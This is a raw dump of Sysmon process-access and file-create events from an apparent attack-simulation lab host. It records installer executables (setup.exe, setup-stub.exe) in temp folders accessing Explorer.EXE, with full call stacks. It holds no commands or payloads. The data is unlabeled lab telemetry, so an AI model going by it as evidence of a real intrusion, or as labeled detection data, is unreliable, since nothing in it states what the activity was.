13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll2021-01-18 13:59:52.161 10341000x800000000000000014354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.161{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 